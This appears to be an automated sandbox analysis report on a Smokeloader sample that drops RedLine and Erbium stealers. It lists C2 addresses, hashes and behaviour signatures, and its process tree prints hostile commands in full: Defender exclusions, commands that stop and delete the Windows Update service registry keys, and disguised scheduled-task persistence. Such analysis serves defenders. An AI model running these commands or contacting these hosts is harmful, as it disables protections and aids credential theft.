Analysis
-
max time kernel
152s -
max time network
161s -
platform
windows10-1703_x64 -
resource
win10-20220812-en -
resource tags
arch:x64arch:x86image:win10-20220812-enlocale:en-usos:windows10-1703-x64system -
submitted
22-10-2022 16:07
Static task
static1
Behavioral task
behavioral1
Sample
fc95b7657625f27a1d1da6644e513ddef964a71d27f8d967a59a27b67519f545.exe
Resource
win10-20220812-en
General
-
Target
fc95b7657625f27a1d1da6644e513ddef964a71d27f8d967a59a27b67519f545.exe
-
Size
224KB
-
MD5
0d7ef768e438cca7715e0613bc339dc9
-
SHA1
ddb08e01fe98df1e0d319f88c529b9f59ccab22d
-
SHA256
fc95b7657625f27a1d1da6644e513ddef964a71d27f8d967a59a27b67519f545
-
SHA512
2938185c6ed1b7c640ac8115c7e2d12bca826097eefab41c4ce797f72d5eb81d549b45138256f764e43705511b399d17c6b263957a64ca3778887a6b779b7b66
-
SSDEEP
3072:1XL6L1ZL98gb5lOqCKZzrCfpMuGyWIcIpPKuRuTmQJrUCH:x+L3N7BCEHCnRBcgPKQuqurZ
Malware Config
Extracted
redline
nam7
103.89.90.61:34589
-
auth_value
533c8fbdab4382453812c73ea2cee5b8
Extracted
redline
slovarikinstalls
78.153.144.3:2510
-
auth_value
5f80b2ec82e3bd02a08a3a55d3180551
Extracted
redline
Google2
167.235.71.14:20469
-
auth_value
fb274d9691235ba015830da570a13578
Extracted
redline
Newe
89.208.106.66:4691
-
auth_value
e7141b98243e53ec71dadf6344aff038
Extracted
erbium
http://77.73.133.53/cloud/index.php
Signatures
-
Detects Smokeloader packer 1 IoCs
resource yara_rule behavioral1/memory/1804-146-0x0000000002C80000-0x0000000002C89000-memory.dmp family_smokeloader -
Modifies security service 2 TTPs 5 IoCs
description ioc Process Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0 reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1 reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo reg.exe -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 14 IoCs
resource yara_rule behavioral1/memory/2828-181-0x00000000001A0000-0x00000000001FC000-memory.dmp family_redline behavioral1/memory/4568-183-0x00000000009E0000-0x0000000000A3C000-memory.dmp family_redline behavioral1/memory/4780-187-0x0000000001020000-0x000000000107C000-memory.dmp family_redline behavioral1/memory/1692-195-0x0000000000400000-0x0000000000428000-memory.dmp family_redline behavioral1/memory/4904-197-0x0000000000400000-0x0000000000428000-memory.dmp family_redline behavioral1/memory/4848-194-0x00000000003C0000-0x00000000003E8000-memory.dmp family_redline behavioral1/memory/4848-215-0x00000000003E21AE-mapping.dmp family_redline behavioral1/memory/1692-214-0x0000000000422136-mapping.dmp family_redline behavioral1/memory/4904-216-0x0000000000422146-mapping.dmp family_redline behavioral1/memory/4780-262-0x0000000001020000-0x000000000107C000-memory.dmp family_redline behavioral1/memory/2828-263-0x00000000001A0000-0x00000000001FC000-memory.dmp family_redline behavioral1/memory/4568-272-0x00000000009E0000-0x0000000000A3C000-memory.dmp family_redline behavioral1/memory/1956-662-0x0000000004B00000-0x0000000004B3E000-memory.dmp family_redline behavioral1/memory/1956-821-0x0000000004C50000-0x0000000004C8C000-memory.dmp family_redline -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Downloads MZ/PE file
-
Drops file in Drivers directory 2 IoCs
description ioc Process File created C:\Windows\system32\drivers\etc\hosts drsdgqksbqkplzynvoxo.exe File created C:\Windows\system32\drivers\etc\hosts updater.exe -
Executes dropped EXE 8 IoCs
pid Process 2828 343F.exe 4568 37E9.exe 4780 3DA7.exe 1956 41DE.exe 3312 5D66.exe 105248 drsdgqksbqkplzynvoxo.exe 105312 updater.exe 105436 rvrgwau -
Stops running service(s) 3 TTPs
-
Deletes itself 1 IoCs
pid Process 3012 Process not Found -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Uses the VBS compiler for execution 1 TTPs
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Suspicious use of SetThreadContext 5 IoCs
description pid Process procid_target PID 2828 set thread context of 1692 2828 343F.exe 70 PID 4568 set thread context of 4848 4568 37E9.exe 69 PID 4780 set thread context of 4904 4780 3DA7.exe 71 PID 3312 set thread context of 105044 3312 5D66.exe 84 PID 105312 set thread context of 47776 105312 updater.exe 128 -
Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 105256 sc.exe 105212 sc.exe 105172 sc.exe 105268 sc.exe 89568 sc.exe 35184 sc.exe 105284 sc.exe 105212 sc.exe 105460 sc.exe 105428 sc.exe -
Program crash 1 IoCs
pid pid_target Process procid_target 105112 3312 WerFault.exe 73 -
Checks SCSI registry key(s) 3 TTPs 6 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI fc95b7657625f27a1d1da6644e513ddef964a71d27f8d967a59a27b67519f545.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI fc95b7657625f27a1d1da6644e513ddef964a71d27f8d967a59a27b67519f545.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI fc95b7657625f27a1d1da6644e513ddef964a71d27f8d967a59a27b67519f545.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI rvrgwau Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI rvrgwau Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI rvrgwau -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2482096546-1136599444-1359412500-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\SplashScreen Process not Found -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1804 fc95b7657625f27a1d1da6644e513ddef964a71d27f8d967a59a27b67519f545.exe 1804 fc95b7657625f27a1d1da6644e513ddef964a71d27f8d967a59a27b67519f545.exe 3012 Process not Found 3012 Process not Found 3012 Process not Found 3012 Process not Found 3012 Process not Found 3012 Process not Found 3012 Process not Found 3012 Process not Found 3012 Process not Found 3012 Process not Found 3012 Process not Found 3012 Process not Found 3012 Process not Found 3012 Process not Found 3012 Process not Found 3012 Process not Found 3012 Process not Found 3012 Process not Found 3012 Process not Found 3012 Process not Found 3012 Process not Found 3012 Process not Found 3012 Process not Found 3012 Process not Found 3012 Process not Found 3012 Process not Found 3012 Process not Found 3012 Process not Found 3012 Process not Found 3012 Process not Found 3012 Process not Found 3012 Process not Found 3012 Process not Found 3012 Process not Found 3012 Process not Found 3012 Process not Found 3012 Process not Found 3012 Process not Found 3012 Process not Found 3012 Process not Found 3012 Process not Found 3012 Process not Found 3012 Process not Found 3012 Process not Found 3012 Process not Found 3012 Process not Found 3012 Process not Found 3012 Process not Found 3012 Process not Found 3012 Process not Found 3012 Process not Found 3012 Process not Found 3012 Process not Found 3012 Process not Found 3012 Process not Found 3012 Process not Found 3012 Process not Found 3012 Process not Found 3012 Process not Found 3012 Process not Found 3012 Process not Found 3012 Process not Found -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 3012 Process not Found -
Suspicious behavior: MapViewOfSection 20 IoCs
pid Process 1804 fc95b7657625f27a1d1da6644e513ddef964a71d27f8d967a59a27b67519f545.exe 3012 Process not Found 3012 Process not Found 3012 Process not Found 3012 Process not Found 3012 Process not Found 3012 Process not Found 3012 Process not Found 3012 Process not Found 3012 Process not Found 3012 Process not Found 3012 Process not Found 3012 Process not Found 3012 Process not Found 3012 Process not Found 3012 Process not Found 3012 Process not Found 3012 Process not Found 3012 Process not Found 105436 rvrgwau -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeShutdownPrivilege 3012 Process not Found Token: SeCreatePagefilePrivilege 3012 Process not Found Token: SeShutdownPrivilege 3012 Process not Found Token: SeCreatePagefilePrivilege 3012 Process not Found Token: SeShutdownPrivilege 3012 Process not Found Token: SeCreatePagefilePrivilege 3012 Process not Found Token: SeShutdownPrivilege 3012 Process not Found Token: SeCreatePagefilePrivilege 3012 Process not Found Token: SeShutdownPrivilege 3012 Process not Found Token: SeCreatePagefilePrivilege 3012 Process not Found Token: SeDebugPrivilege 1956 41DE.exe Token: SeShutdownPrivilege 3012 Process not Found Token: SeCreatePagefilePrivilege 3012 Process not Found Token: SeShutdownPrivilege 3012 Process not Found Token: SeCreatePagefilePrivilege 3012 Process not Found Token: SeShutdownPrivilege 3012 Process not Found Token: SeCreatePagefilePrivilege 3012 Process not Found Token: SeShutdownPrivilege 3012 Process not Found Token: SeCreatePagefilePrivilege 3012 Process not Found Token: SeShutdownPrivilege 3012 Process not Found Token: SeCreatePagefilePrivilege 3012 Process not Found Token: SeShutdownPrivilege 3012 Process not Found Token: SeCreatePagefilePrivilege 3012 Process not Found Token: SeShutdownPrivilege 3012 Process not Found Token: SeCreatePagefilePrivilege 3012 Process not Found Token: SeShutdownPrivilege 3012 Process not Found Token: SeCreatePagefilePrivilege 3012 Process not Found Token: SeShutdownPrivilege 3012 Process not Found Token: SeCreatePagefilePrivilege 3012 Process not Found Token: SeShutdownPrivilege 3012 Process not Found Token: SeCreatePagefilePrivilege 3012 Process not Found Token: SeShutdownPrivilege 3012 Process not Found Token: SeCreatePagefilePrivilege 3012 Process not Found Token: SeShutdownPrivilege 3012 Process not Found Token: SeCreatePagefilePrivilege 3012 Process not Found Token: SeShutdownPrivilege 3012 Process not Found Token: SeCreatePagefilePrivilege 3012 Process not Found Token: SeShutdownPrivilege 3012 Process not Found Token: SeCreatePagefilePrivilege 3012 Process not Found Token: SeShutdownPrivilege 3012 Process not Found Token: SeCreatePagefilePrivilege 3012 Process not Found Token: SeShutdownPrivilege 3012 Process not Found Token: SeCreatePagefilePrivilege 3012 Process not Found Token: SeShutdownPrivilege 3012 Process not Found Token: SeCreatePagefilePrivilege 3012 Process not Found Token: SeShutdownPrivilege 3012 Process not Found Token: SeCreatePagefilePrivilege 3012 Process not Found Token: SeShutdownPrivilege 3012 Process not Found Token: SeCreatePagefilePrivilege 3012 Process not Found Token: SeShutdownPrivilege 3012 Process not Found Token: SeCreatePagefilePrivilege 3012 Process not Found Token: SeShutdownPrivilege 3012 Process not Found Token: SeCreatePagefilePrivilege 3012 Process not Found Token: SeDebugPrivilege 105364 powershell.exe Token: SeIncreaseQuotaPrivilege 105364 powershell.exe Token: SeSecurityPrivilege 105364 powershell.exe Token: SeTakeOwnershipPrivilege 105364 powershell.exe Token: SeLoadDriverPrivilege 105364 powershell.exe Token: SeSystemProfilePrivilege 105364 powershell.exe Token: SeSystemtimePrivilege 105364 powershell.exe Token: SeProfSingleProcessPrivilege 105364 powershell.exe Token: SeIncBasePriorityPrivilege 105364 powershell.exe Token: SeCreatePagefilePrivilege 105364 powershell.exe Token: SeBackupPrivilege 105364 powershell.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 3012 Process not Found -
Suspicious use of SendNotifyMessage 5 IoCs
pid Process 3012 Process not Found 3012 Process not Found 3012 Process not Found 3012 Process not Found 3012 Process not Found -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 3012 Process not Found -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3012 wrote to memory of 2828 3012 Process not Found 66 PID 3012 wrote to memory of 2828 3012 Process not Found 66 PID 3012 wrote to memory of 2828 3012 Process not Found 66 PID 3012 wrote to memory of 4568 3012 Process not Found 67 PID 3012 wrote to memory of 4568 3012 Process not Found 67 PID 3012 wrote to memory of 4568 3012 Process not Found 67 PID 3012 wrote to memory of 4780 3012 Process not Found 68 PID 3012 wrote to memory of 4780 3012 Process not Found 68 PID 3012 wrote to memory of 4780 3012 Process not Found 68 PID 3012 wrote to memory of 1956 3012 Process not Found 72 PID 3012 wrote to memory of 1956 3012 Process not Found 72 PID 3012 wrote to memory of 1956 3012 Process not Found 72 PID 4780 wrote to memory of 4904 4780 3DA7.exe 71 PID 4780 wrote to memory of 4904 4780 3DA7.exe 71 PID 4780 wrote to memory of 4904 4780 3DA7.exe 71 PID 4568 wrote to memory of 4848 4568 37E9.exe 69 PID 4568 wrote to memory of 4848 4568 37E9.exe 69 PID 4568 wrote to memory of 4848 4568 37E9.exe 69 PID 2828 wrote to memory of 1692 2828 343F.exe 70 PID 2828 wrote to memory of 1692 2828 343F.exe 70 PID 2828 wrote to memory of 1692 2828 343F.exe 70 PID 4568 wrote to memory of 4848 4568 37E9.exe 69 PID 4780 wrote to memory of 4904 4780 3DA7.exe 71 PID 2828 wrote to memory of 1692 2828 343F.exe 70 PID 2828 wrote to memory of 1692 2828 343F.exe 70 PID 4568 wrote to memory of 4848 4568 37E9.exe 69 PID 4780 wrote to memory of 4904 4780 3DA7.exe 71 PID 3012 wrote to memory of 3312 3012 Process not Found 73 PID 3012 wrote to memory of 3312 3012 Process not Found 73 PID 3012 wrote to memory of 3312 3012 Process not Found 73 PID 3012 wrote to memory of 5068 3012 Process not Found 75 PID 3012 wrote to memory of 5068 3012 Process not Found 75 PID 3012 wrote to memory of 5068 3012 Process not Found 75 PID 3012 wrote to memory of 5068 3012 Process not Found 75 PID 3012 wrote to memory of 4756 3012 Process not Found 76 PID 3012 wrote to memory of 4756 3012 Process not Found 76 PID 3012 wrote to memory of 4756 3012 Process not Found 76 PID 3012 wrote to memory of 15460 3012 Process not Found 77 PID 3012 wrote to memory of 15460 3012 Process not Found 77 PID 3012 wrote to memory of 15460 3012 Process not Found 77 PID 3012 wrote to memory of 15460 3012 Process not Found 77 PID 3012 wrote to memory of 31212 3012 Process not Found 78 PID 3012 wrote to memory of 31212 3012 Process not Found 78 PID 3012 wrote to memory of 31212 3012 Process not Found 78 PID 3012 wrote to memory of 45736 3012 Process not Found 79 PID 3012 wrote to memory of 45736 3012 Process not Found 79 PID 3012 wrote to memory of 45736 3012 Process not Found 79 PID 3012 wrote to memory of 45736 3012 Process not Found 79 PID 3012 wrote to memory of 60628 3012 Process not Found 80 PID 3012 wrote to memory of 60628 3012 Process not Found 80 PID 3012 wrote to memory of 60628 3012 Process not Found 80 PID 3012 wrote to memory of 60628 3012 Process not Found 80 PID 3012 wrote to memory of 74744 3012 Process not Found 81 PID 3012 wrote to memory of 74744 3012 Process not Found 81 PID 3012 wrote to memory of 74744 3012 Process not Found 81 PID 3012 wrote to memory of 74744 3012 Process not Found 81 PID 3012 wrote to memory of 83536 3012 Process not Found 82 PID 3012 wrote to memory of 83536 3012 Process not Found 82 PID 3012 wrote to memory of 83536 3012 Process not Found 82 PID 3012 wrote to memory of 93180 3012 Process not Found 83 PID 3012 wrote to memory of 93180 3012 Process not Found 83 PID 3012 wrote to memory of 93180 3012 Process not Found 83 PID 3012 wrote to memory of 93180 3012 Process not Found 83 PID 3312 wrote to memory of 105044 3312 5D66.exe 84
Processes
-
C:\Users\Admin\AppData\Local\Temp\fc95b7657625f27a1d1da6644e513ddef964a71d27f8d967a59a27b67519f545.exe"C:\Users\Admin\AppData\Local\Temp\fc95b7657625f27a1d1da6644e513ddef964a71d27f8d967a59a27b67519f545.exe"1⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:1804
-
C:\Users\Admin\AppData\Local\Temp\343F.exeC:\Users\Admin\AppData\Local\Temp\343F.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:2828 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"2⤵PID:1692
-
-
C:\Users\Admin\AppData\Local\Temp\37E9.exeC:\Users\Admin\AppData\Local\Temp\37E9.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:4568 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"2⤵PID:4848
-
-
C:\Users\Admin\AppData\Local\Temp\3DA7.exeC:\Users\Admin\AppData\Local\Temp\3DA7.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:4780 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"2⤵PID:4904
-
-
C:\Users\Admin\AppData\Local\Temp\41DE.exeC:\Users\Admin\AppData\Local\Temp\41DE.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1956
-
C:\Users\Admin\AppData\Local\Temp\5D66.exeC:\Users\Admin\AppData\Local\Temp\5D66.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:3312 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"2⤵PID:105044
-
C:\Users\Admin\AppData\Local\Temp\drsdgqksbqkplzynvoxo.exe"C:\Users\Admin\AppData\Local\Temp\drsdgqksbqkplzynvoxo.exe"3⤵
- Drops file in Drivers directory
- Executes dropped EXE
PID:105248 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force4⤵
- Suspicious use of AdjustPrivilegeToken
PID:105364
-
-
C:\Windows\SYSTEM32\cmd.execmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f4⤵PID:105076
-
C:\Windows\system32\sc.exesc stop UsoSvc5⤵
- Launches sc.exe
PID:105212
-
-
C:\Windows\system32\sc.exesc stop WaaSMedicSvc5⤵
- Launches sc.exe
PID:105460
-
-
C:\Windows\system32\sc.exesc stop wuauserv5⤵
- Launches sc.exe
PID:105268
-
-
C:\Windows\system32\sc.exesc stop bits5⤵
- Launches sc.exe
PID:105428
-
-
C:\Windows\system32\sc.exesc stop dosvc5⤵
- Launches sc.exe
PID:105284
-
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f5⤵PID:105432
-
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f5⤵PID:105208
-
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f5⤵
- Modifies security service
PID:105428
-
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f5⤵PID:944
-
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f5⤵PID:4968
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell <#gesvv#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe' }4⤵PID:105140
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell <#btrwhe#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe" }4⤵PID:105268
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC5⤵PID:101776
-
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3312 -s 2031842⤵
- Program crash
PID:105112
-
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:5068
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵PID:4756
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:15460
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵PID:31212
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:45736
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:60628
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:74744
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵PID:83536
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:93180
-
C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exeC:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe1⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:105312 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵PID:105228
-
-
C:\Windows\system32\cmd.execmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f2⤵PID:2832
-
C:\Windows\system32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
PID:89568
-
-
C:\Windows\system32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
PID:35184
-
-
C:\Windows\system32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
PID:105256
-
-
C:\Windows\system32\sc.exesc stop bits3⤵
- Launches sc.exe
PID:105212
-
-
C:\Windows\system32\sc.exesc stop dosvc3⤵
- Launches sc.exe
PID:105172
-
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f3⤵PID:105212
-
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f3⤵PID:105420
-
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f3⤵PID:105144
-
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f3⤵PID:105172
-
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f3⤵PID:105212
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell <#gesvv#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe' }2⤵PID:101796
-
-
C:\Windows\system32\conhost.exeC:\Windows\system32\conhost.exe cuujhamlfzwomvc2⤵PID:47776
-
C:\Windows\system32\cmd.execmd /c mkdir "C:\Users\Admin\AppData\Roaming\Google\Libs\" & wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Users\Admin\AppData\Roaming\Google\Libs\g.log"3⤵PID:85128
-
-
-
C:\Windows\system32\cmd.execmd /c mkdir "C:\Users\Admin\AppData\Roaming\Google\Libs\" & wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Users\Admin\AppData\Roaming\Google\Libs\g.log"2⤵PID:105076
-
C:\Windows\System32\Wbem\WMIC.exewmic PATH Win32_VideoController GET Name, VideoProcessor3⤵PID:87500
-
-
-
C:\Users\Admin\AppData\Roaming\rvrgwauC:\Users\Admin\AppData\Roaming\rvrgwau1⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:105436
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD58592ba100a78835a6b94d5949e13dfc1
SHA163e901200ab9a57c7dd4c078d7f75dcd3b357020
SHA256fdd7d9def6f9f0c0f2e60dbc8a2d1999071cd7d3095e9e087bb1cda7a614ac3c
SHA51287f98e6cb61b2a2a7d65710c4d33881d89715eb7a06e00d492259f35c3902498baabffc5886be0ec5a14312ad4c262e3fc40cd3a5cb91701af0fb229726b88c3
-
Filesize
1KB
MD5e757f8042d9d1987aba65b6749886962
SHA1f848b84403a92e70cbeb25f3d69c3fd14f3bbff7
SHA256189309f905dba86ec982d79116b6407e90ef3732af842fd22781c6ebb3ed0a53
SHA5122115ddbfadff44c71478adeeafa85ab4059186d93b25972578d6855806aeedb071e42c23c9053100db2e69e5da34668bf154345cacb196e6fbd2e98a8e64d272
-
Filesize
1KB
MD56d819fd63e2cb8369fbdfc4374d2046d
SHA11f7b0a2e216bdd3e1bd9f0132679be357bdc3e58
SHA25657815bc72569d88761195f2bc82908c069d0d6946732b607fb0c513697d52f04
SHA51207a5cc54700fee4478ee08d6ce34df788aa859afd6fb425a83bf31160f9a127b429f833afe17e8030eee4117f2fbe3d337ba51bf51c4640f37bd0d2aff331381
-
Filesize
1KB
MD57bb6d5e8cae7dc31096311022a49c16a
SHA11cef81fc9fb48adc644fb6e8e995538c7156589a
SHA256c9c05ec462de1da171433f54eac8c52517cc0456d884c1335cf397583a762f2f
SHA512cb2cf67e78dabdcfabec87d01133940894793181e83596797edc3228932428b5a8922184be1660fdad21b6425bdeebc175e4ebfe305dbaea3a62e30d35a12203
-
Filesize
1KB
MD5246934d207db1483b7d9978aaecb58a1
SHA16fd53faf19a0a64afd2b5b3ef8cfc650cb111ae9
SHA2563b2476428f3e7017701cbf2c8bbc1ff3a6b5456d878b856357a342223c79d6d6
SHA512b780d574316849db1fc495aa3de6d337a0ea2a706918afaa2554204378e96419db1482c78a3ee690b6dcad67afaa60c5a94868ddbd5c3bafe55da6fdda61e65f
-
Filesize
355KB
MD5de9cc8f0aca4cbab79ae9ed574ad9d79
SHA1a1f8f805a2fcb1253fd006ac5710ef7cd77fbb8a
SHA256c64cb4f10302ee642e3f4448366075af371219e7ca9743e97d6574ab222ff294
SHA5126b913c8dc69790775daa47d08d54d17747c2fc76ff96ea61065dc7bea11960556cefed8ff366e9867db5c0633661665ed6eb099b48117018662aa1b03164f118
-
Filesize
355KB
MD5de9cc8f0aca4cbab79ae9ed574ad9d79
SHA1a1f8f805a2fcb1253fd006ac5710ef7cd77fbb8a
SHA256c64cb4f10302ee642e3f4448366075af371219e7ca9743e97d6574ab222ff294
SHA5126b913c8dc69790775daa47d08d54d17747c2fc76ff96ea61065dc7bea11960556cefed8ff366e9867db5c0633661665ed6eb099b48117018662aa1b03164f118
-
Filesize
355KB
MD57a25eee3fa668991ae69109ec2869215
